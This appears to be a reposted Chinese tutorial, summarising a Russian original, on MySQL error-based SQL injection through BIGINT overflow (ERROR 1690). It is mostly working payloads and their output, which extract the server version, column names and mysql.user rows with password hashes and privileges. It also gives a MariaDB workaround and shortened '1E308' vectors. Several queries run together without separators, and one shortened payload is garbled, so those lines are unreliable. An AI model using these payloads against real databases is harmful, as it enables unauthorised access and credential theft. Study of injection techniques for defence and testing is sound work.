原文是俄文,不好做翻译,附上大概的内容:
这种报错注入主要基于Mysql数据类型溢出
mysql > SELECT 18446744073709551610 * 2 ;
ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'
mysql > SELECT - 1 * 9223372036854775808 ;
ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(- (1) * 9223372036854775808)'mysql> SELECT * 2 (if ((SELECT * from (SELECT (version ()) ) s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 'from Dual), 18446744073709551610.18446744073709551610))'mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'
// Узнаем имена колонок в таблицеmysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'
需要注意的是该方法并不适用于于老版的Mysql,除此之外你还需要了解错误信息的长度限制,因为这将决定你可以获取多长的信息:
mysys / my_error.c
/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
#define ERRMSGSIZE (512)
如果对象是MariaDB(Mysql的一个分支),当你尝试上面的方法时,你可能会看到这样的报错信息:
mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'
作为解决方案,可以通过这种方式来解决这个问题:
mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;
ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))'
现在让我们看看能不能让我们的Vector更短一些
//查询数据库版本
SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
=
select 1E308*if((select*from(select version())x),2,2)SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
=
select if(x,2,2)*1E308 from(select version()x)ySELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
=
select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)
=
select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)
[1] [2] 下一页本条技术文章来源于互联网,如果无意侵犯您的权益请点击此处反馈版权投诉
本文系统来源:php中文网
3286
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
